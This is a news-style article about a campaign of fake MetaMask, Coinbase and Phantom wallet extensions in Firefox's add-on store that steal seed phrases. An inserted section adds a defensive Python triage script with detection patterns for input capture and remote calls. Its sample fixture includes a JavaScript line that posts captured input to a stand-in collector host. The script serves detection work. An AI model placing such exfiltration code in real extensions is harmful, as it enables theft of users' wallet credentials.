Fake Wallets Stealing Millions

While Mozilla’s Firefox browser is known for its privacy-focused features, its add-ons store has become a breeding ground for crypto thieves. Since April 2025, cybersecurity researchers have identified over 40 malicious extensions masquerading as popular cryptocurrency wallets like MetaMask, Coinbase, and Phantom. These aren’t your average copycats – they’re sophisticated operations run by Russian-speaking hackers who know exactly what they’re doing. Hardware wallets could have prevented many of these thefts by keeping private keys completely offline.

The scammers’ playbook is pretty clever, actually. They grab open-source wallet code, inject their malicious tweaks, and slap on some stolen branding. Then comes the social engineering: fake five-star reviews that somehow show more ratings than actual installations. Real smooth, guys. Mozilla has already taken down nearly all of the identified malicious add-ons in response.

These phony extensions sit there for weeks, waiting for unsuspecting users while Mozilla plays catch-up with its improved detection measures. The technical side is where it gets nasty. These fake wallets silently monitor for crypto credentials, hiding their tracks by making error messages invisible.

When users type in their seed phrases or private keys – poof! The data gets whisked away to the attackers’ servers, along with the victim’s IP address. Before anyone realizes what’s happened, the criminals have drained the wallets and laundered the funds through decentralized exchanges. Koi Security’s analysis revealed the extensive scope of this ongoing campaign.
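As an added example (not from the original article or from Koi Security’s analysis), here is a defender-side triage check in Python that flags an unpacked add-on on the signals described above: a wallet-brand name from an unverified publisher, more ratings than installs, input capture combined with a remote host, and CSS that hides error messages. The regex patterns, the publisher allowlist, and the sample listing are assumptions constructed for illustration.

```python
import re

# Brands named in the article; the publisher allowlist is a hypothetical placeholder.
BRANDS = ("metamask", "coinbase", "phantom")
TRUSTED_PUBLISHERS = {"official-publisher-placeholder"}

# Heuristic patterns (assumptions chosen for this example, not taken from the campaign).
INPUT_HOOK = re.compile(r"addEventListener\(\s*['\"](input|keyup|change|paste)['\"]")
NETWORK_CALL = re.compile(r"\b(fetch|XMLHttpRequest|sendBeacon)\b")
HIDDEN_ERROR = re.compile(
    r"error[^;{}]*\{[^}]*(opacity\s*:\s*0|display\s*:\s*none|color\s*:\s*transparent)", re.I)
REMOTE_HOST = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def triage(listing, sources, allowed_hosts=frozenset()):
    """Return a list of (signal, detail) findings for one add-on."""
    findings = []
    name = listing["name"].lower()
    brand = next((b for b in BRANDS if b in name), None)
    if brand and listing["publisher"] not in TRUSTED_PUBLISHERS:
        findings.append(("brand-impersonation", brand))
    # The article's listing signal: more ratings than actual installations.
    if listing["ratings"] > listing["users"]:
        findings.append(("ratings-exceed-installs", f'{listing["ratings"]}>{listing["users"]}'))
    for path, text in sources.items():
        # Form-input hooks plus a network call to a host outside the allowlist.
        if INPUT_HOOK.search(text) and NETWORK_CALL.search(text):
            hosts = sorted({h.lower() for h in REMOTE_HOST.findall(text)} - set(allowed_hosts))
            if hosts:
                findings.append(("input-capture-with-remote-host", f"{path}: {', '.join(hosts)}"))
        # Styling that makes error messages invisible to the user.
        if HIDDEN_ERROR.search(text):
            findings.append(("hidden-error-styling", path))
    return findings


# Constructed sample input, not data from the real campaign.
SAMPLE_LISTING = {"name": "Phantom Wallet", "publisher": "unknown-dev", "users": 12, "ratings": 340}
SAMPLE_SOURCES = {
    "content.js": 'field.addEventListener("input", onChange);\n'
                  'function report(v) { fetch("https://collector.example/log", {method: "POST", body: v}); }',
    "popup.css": ".error-message { opacity: 0; }",
}

if __name__ == "__main__":
    for signal, detail in triage(SAMPLE_LISTING, SAMPLE_SOURCES):
        print(f"{signal}: {detail}")
```

Each finding is a lead for manual review, not a verdict: legitimate add-ons also listen to form inputs and call remote APIs, so the signals matter most when several appear together.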

The damage? Millions in stolen crypto, with high-profile victims watching their entire balances vanish across multiple blockchain networks. Mozilla acknowledges the threat, but new malicious extensions keep popping up faster than they can be removed. It’s like a game of whack-a-mole, except people are losing their life savings.

The threat actors remain at large, their operation showing no signs of slowing down. They’re technically sophisticated, persistent, and evolving their methods to dodge store reviews. While Mozilla implements stronger security measures, the Firefox Add-ons store remains a dangerous place for crypto users.

The exact amount stolen remains under wraps, but one thing’s crystal clear – these aren’t amateur-hour hackers.